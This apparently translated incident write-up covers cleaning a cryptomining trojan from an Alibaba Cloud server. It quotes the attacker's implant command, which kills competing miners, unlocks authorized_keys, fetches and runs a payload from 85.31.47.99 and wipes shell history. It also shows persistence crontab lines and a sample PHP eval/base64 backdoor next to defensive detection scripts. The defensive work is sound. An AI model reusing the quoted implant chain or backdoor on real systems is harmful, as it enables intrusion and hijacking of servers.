Background:
Alibaba Cloud server alert: a trojan had been implanted and the server's CPU usage spiked.
Handling:
# Trojan implant command:
./network rm -rf /var/tmp/Documents ;
mkdir /var/tmp/Documents 2>&1 ;
crontab -r ;
chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ;
cd /var/tmp ;
chattr -iae /var/tmp/Documents/.diicot ;
pkill Opera ; pkill cnrig ; pkill java ;
killall java ;
pkill xmrig ;
killall cnrig ;
killall xmrig ;
cd /var/tmp/;
mv /var/tmp/diicot /var/tmp/Documents/.diicot ;
mv /var/tmp/kuak /var/tmp/Documents/kuak ;
cd /var/tmp/Documents ;
chmod +x .* ;
/var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ;
history -c ;
rm -rf .bash_history ~/.bash_history ;
rm -rf /tmp/cache ; cd /tmp/ ;
wget -q 85.31.47.99/.NzJjOTYwxx5/.balu || curl -O -s -L 85.31.47.99/.NzJjOTYwxx5/.balu ;
mv .balu cache ; chmod +x cache ;
./cache >/dev/null 2>&1 & disown ;
history -c ;
rm -rf .bash_history ~/.bash_history
Command analysis:
Remediation steps:
1. Close the server's SSH port
2. Check the abnormal processes currently running:
ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig"   # cross-check against the process names used in the malicious script
top/htop                                             # look for processes with abnormal CPU/memory usage (miners usually consume a lot of resources)
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z ~]$ ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig"
root      3836  0.0  0.0 1227348  3340 ?        Sl   04:04   0:00 cache
www      26335  0.0  0.1  196180 11772 ?        S    Aug03   0:02 nginx: cache manager process
ecs-ass+ 31383  0.0  0.0  112812   988 pts/0    R+   10:08   0:00 grep --color=auto -E diicot|kuak|cache|xmrig|cnrig
3. Forcibly terminate the suspicious process (using its process ID, e.g. 1234):
sudo kill -9 3836
sudo rm -rf /tmp/cache /var/tmp/Documents
# Check for other associated files or process-resurrection mechanisms (such as scheduled tasks):
sudo crontab -l          # list the current user's scheduled tasks
sudo ls -la /etc/cron*   # check system-level scheduled tasks
top output:
top - 10:20:22 up 64 days, 14:19,  0 users,  load average: 15.06, 12.13, 10.91
Tasks: 204 total,   8 running, 195 sleeping,   1 stopped,   0 zombie
%Cpu(s): 52.2 us, 47.8 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.1 si,  0.0 st
KiB Mem :  7732792 total,   272968 free,  4592416 used,  2867408 buff/cache
KiB Swap:        0 total,        0 free,        0 used.  2514492 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 3868 root      20   0 2441952   2.3g      4 S  73.1 31.1 646:32.16 151e8df3
31337 www       20   0  244260  27740   4920 R  47.5  0.4   1:35.97 php-fpm
31458 www       20   0  244256  27244   4920 R  45.8  0.4   0:47.46 php-fpm
31871 www       20   0  244196  27972   4912 R  44.2  0.4   0:34.83 php-fpm
32106 www       20   0  242148  26684   4900 R  43.2  0.3   0:14.48 php-fpm
32182 www       20   0  244196  27088   4848 R  43.2  0.4   0:06.68 php-fpm
31430 www       20   0  242216  26768   4916 R  42.2  0.3   1:49.48 php-fpm
32238 www       20   0  233952  17176   4840 S  10.6  0.2   0:00.32 php-fpm
32102 www       20   0  244256  27208   4876 S   8.3  0.4   0:24.24 php-fpm
31875 www       20   0  242208  25208   4920 S   7.6  0.3   0:30.23 php-fpm
31429 www       20   0  242148  25696   4916 S   7.3  0.3   0:59.79 php-fpm
31874 www       20   0  242148  26692   4884 S   7.3  0.3   0:30.45 php-fpm
31876 www       20   0  242208  25756   4920 S   7.3  0.3   0:51.94 php-fpm
31903 www       20   0  242144  27176   4904 S   7.0  0.4   0:09.00 php-fpm
 1117 root      20   0 2436596  17372   6900 S   1.0  0.2 411:08.98 argusagent
24119 root      20   0  231340  83840  10360 S   1.0  1.1 295:33.94 AliYunDunMonito
 2036 redis     20   0  565288 249392   1996 S   0.3  3.2 228:12.62 redis-server
22120 root      20   0  686528   9628   5172 S   0.3  0.1  35:45.96 aliyun-service
24086 root      20   0  118508   8144   4832 S   0.3  0.1  85:02.77 AliYunDun
26331 www       20   0  245704  69064  10580 S   0.3  0.9   5:56.22 nginx
26333 www       20   0  250752  74476  10576 S   0.3  1.0  23:57.13 nginx
32232 ecs-ass+  20   0  162104   2348   1592 R   0.3  0.0   0:00.03 top
    1 root      20   0   51868   3664   2144 S   0.0  0.0   9:03.38 systemd
Find the executable path of the 151e8df3 process:
sudo ls -l /proc/3868/exe           # while the process is still alive, read its executable path via /proc
# if it has already exited, search the system for files with a similar name
sudo find / -name "151e8df3" -type f
sudo rm -f /path/to/151e8df3
Handling the scheduled tasks:
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo crontab -l
@daily /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
@reboot /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
* * * * * /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
@monthly /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo ls -la /etc/cron*
-rw-------  1 root root   0 May 16  2023 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jun 10  2014 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
-rw-r--r--   1 root root  128 May 16  2023 0hourly
-rw-------   1 root root  235 Dec 16  2022 sysstat

/etc/cron.daily:
total 16
drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
-rwx------.  1 root root  219 Apr  1  2020 logrotate
-rwxr-xr-x.  1 root root  618 Oct 30  2018 man-db.cron

/etc/cron.hourly:
total 12
drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
-rwxr-xr-x   1 root root  392 May 16  2023 0anacron

/etc/cron.monthly:
total 8
drwxr-xr-x.  2 root root 4096 Jun 10  2014 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..

/etc/cron.weekly:
total 8
drwxr-xr-x.  2 root root 4096 Jun 10  2014 .
drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
sudo crontab -r                  # remove all of the current user's (root's) scheduled tasks
sudo rm -rf /var/tmp/9659fb05    # delete the entire malware directory
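As an added example (not part of the original post), the following POSIX shell helpers automate two of the checks above: step 3's question of where a running process was loaded from, answered through /proc/PID/exe, and the review of the crontab entries. The indicator list (binaries under /tmp, /var/tmp or /dev/shm, hidden dot-files, output discarded and detached with `& disown`) is taken from the entries recovered above; the sample crontab text is constructed for the demonstration and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original post.  Helper functions for triaging a
# host that shows the symptoms described above (miner dropped under /var/tmp,
# persistence through root's crontab).  Assumptions: Linux /proc is available,
# and the indicators below are the ones visible in the recovered crontab.

# suspicious_exe_procs: list PID and executable of every process whose binary
# lives in a world-writable scratch directory or has already been deleted
# from disk (a common sign of a dropper that removes itself after starting).
suspicious_exe_procs() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # kernel threads / no permission
        case $exe in
            /tmp/*|/var/tmp/*|/dev/shm/*|*"(deleted)"*)
                printf '%s %s\n' "${p#/proc/}" "$exe" ;;
        esac
    done
}

# flag_cron_lines: read crontab text on stdin and print every entry matching at
# least one indicator.  Comment and blank lines are ignored.
flag_cron_lines() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' |
    grep -E '(/tmp/|/var/tmp/|/dev/shm/|& *disown|/\.[A-Za-z0-9])'
}

# count_flagged: number of flagged entries (prints 0 and succeeds when none).
count_flagged() {
    flag_cron_lines | grep -c . || true
}

# Constructed sample: the four entries recovered in the incident plus one
# benign entry that must not be flagged.
SAMPLE_CRONTAB='@daily /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
@reboot /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
* * * * * /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
@monthly /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
# nightly backup
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1'

# Stand-alone run: show the flagged sample entries, then scan live processes.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
suspicious_exe_procs

# Live usage as root, covering every account rather than only root's crontab:
#   for u in $(cut -d: -f1 /etc/passwd); do
#       crontab -l -u "$u" 2>/dev/null | flag_cron_lines | sed "s/^/$u: /"
#   done
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | flag_cron_lines
```

The per-user loop matters because `crontab -l` alone only shows the invoking user's table; the malware here ran as root, but a dropper that landed through a web shell would typically persist as the web server account instead.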
4. Remove the execute permission from the malicious files
# name the files explicitly: a glob like /var/tmp/Documents/.* also matches . and .., so chmod -x would strip the search bit from the directory and from /var/tmp itself
chmod -x /var/tmp/Documents/.diicot /var/tmp/Documents/kuak /tmp/cache
rm -rf /var/tmp/Documents /tmp/cache
5. Check /etc/rc.local and other boot-time startup scripts:
sudo cat /etc/rc.local
6. The trojan refuses to be deleted:
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z f46a6fbd]$ sudo rm -rf /var/tmp/f46a6fbd/
rm: cannot remove ‘/var/tmp/f46a6fbd/80ff5709’: Operation not permitted
# enter the directory
cd /var/tmp/f46a6fbd/
# inspect the file attributes (if the i or a attribute is set, it must be removed first)
lsattr 80ff5709
# remove the special attributes (-i removes immutable, -a removes append-only)
sudo chattr -ia 80ff5709
7. Scan for tampered code
# search for recently added suspicious PHP files (e.g. files containing dangerous functions such as eval or base64_decode)
sudo find /path/to/website -name "*.php" -mtime -7   # PHP files added or modified within the last 7 days
sudo grep -r "eval(" /path/to/website                # search for files containing dangerous functions
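Added example, not from the original post: a small POSIX shell scanner that combines the two checks in step 7 into one pass over a web root. The indicator list starts from the page's eval and base64_decode and extends it with other common code-execution and obfuscation primitives; the throwaway sample site it builds (one benign page, one file shaped like an injected backdoor) is constructed for the demonstration, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original post.  Scan a PHP web root for recently
# modified files that contain code-execution or obfuscation primitives.
# Assumption: the web root is passed as the first argument.

# Indicators: the page's eval/base64_decode plus other primitives that
# injected PHP backdoors commonly rely on.
PHP_INDICATORS='eval\(|base64_decode\(|gzinflate\(|str_rot13\(|shell_exec\(|passthru\(|system\(|assert\(|preg_replace\(.*/e'

# scan_php_dir DIR [DAYS]: print "file:hit-count" for every .php file modified
# within DAYS days (default 7) that contains at least one indicator.
scan_php_dir() {
    dir=$1; days=${2:-7}
    find "$dir" -type f -name '*.php' -mtime "-$days" | while IFS= read -r f; do
        n=$(grep -cE "$PHP_INDICATORS" -- "$f" || true)   # grep -c exits 1 on zero hits
        [ "$n" -gt 0 ] && printf '%s:%s\n' "$f" "$n"
    done
}

# count_suspicious DIR: number of flagged files (0 and success when none).
count_suspicious() {
    scan_php_dir "$1" | grep -c . || true
}

# make_sample_site: build a throwaway web root with one benign page and one
# hidden file shaped like a typical injected backdoor; print its path.
make_sample_site() {
    d=$(mktemp -d)
    mkdir -p "$d/includes"
    cat > "$d/index.php" <<'EOF'
<?php
require_once __DIR__ . '/includes/config.php';
echo "<h1>Hello</h1>";
EOF
    cat > "$d/includes/.cache.php" <<'EOF'
<?php
@eval(base64_decode($_POST['c']));
EOF
    printf '%s\n' "$d"
}

# Stand-alone run against the constructed site, then clean up.
site=$(make_sample_site)
scan_php_dir "$site"
rm -rf "$site"

# Live usage:  sudo sh -c '. ./scan.sh; scan_php_dir /path/to/website 7'
```

A hit count is only a triage hint: frameworks legitimately call `base64_decode` and `preg_replace`, so compare flagged files against the deployed release (package checksums or the git tree) before deleting anything, and treat a hidden `.php` file that the deployment never shipped as the stronger signal.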